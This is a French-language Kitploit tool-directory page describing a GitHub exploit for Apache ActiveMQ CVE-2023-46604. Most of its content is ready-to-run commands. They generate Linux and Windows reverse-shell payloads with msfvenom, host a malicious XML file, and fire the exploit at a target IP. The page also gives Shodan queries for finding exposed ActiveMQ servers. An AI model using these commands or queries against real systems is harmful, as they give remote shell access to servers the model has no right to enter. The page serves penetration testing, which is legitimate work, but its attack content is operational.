Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ — Réaliser un exploit de shell inversé pour Apache ActiveMQ (CVE_2023-46604) | Kitploit
Outils/GitHubGitHub/saumyajeetdas/cve-2023-46604-rce-reverse-shell-apache-activemq
Génération de PayloadsAnalyse des VulnérabilitésExploitationTests d'IntrusionCommandement et ContrôleOutil d'Accès à Distance
GitHubsaumyajeetdas/cve-2023-46604-rce-reverse-shell-apache-activemq

CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ

Réaliser un exploit de shell inversé pour Apache ActiveMQ (CVE_2023-46604)

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
12640il y a 2 ansVérifié par Kitploit

CVE-2023-46604-RCE-Shell-Inversé-Apache-ActiveMQ

Cet exploit s'appuie sur le travail fondamental disponible sur https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE). Nous avons développé la technique pour obtenir un shell inversé en utilisant le Metasploit Framework (https://github.com/rapid7/metasploit-framework).

Utilisation :

Important : Modifiez manuellement l'adresse IP (0.0.0.0 sur la ligne 11) dans les fichiers XML avec l'adresse IP où le payload sera généré. Si vous suivez les commandes ci-dessous, ce sera votre adresse IP d'écoute. De plus, {IP_Of_Hosted_XML_File} sera votre adresse IP d'écoute.

Pour les cibles Linux/Unix

root@kitploit:~
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml

Pour les cibles Windows

root@kitploit:~
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml

image

Shodan Dork :

  • product:"ActiveMQ OpenWire Transport"
  • image
  • product:"ActiveMQ OpenWire Transport" port:61616
  • image

Travail original :

  • https://github.com/X1r0z/ActiveMQ-RCE

Pour en savoir plus :

  • https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/
  • https://exp10it.cn/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/
  • https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis

Un remerciement spécial à https://github.com/Anon4mous pour son soutien actif.

Télécharger l’outil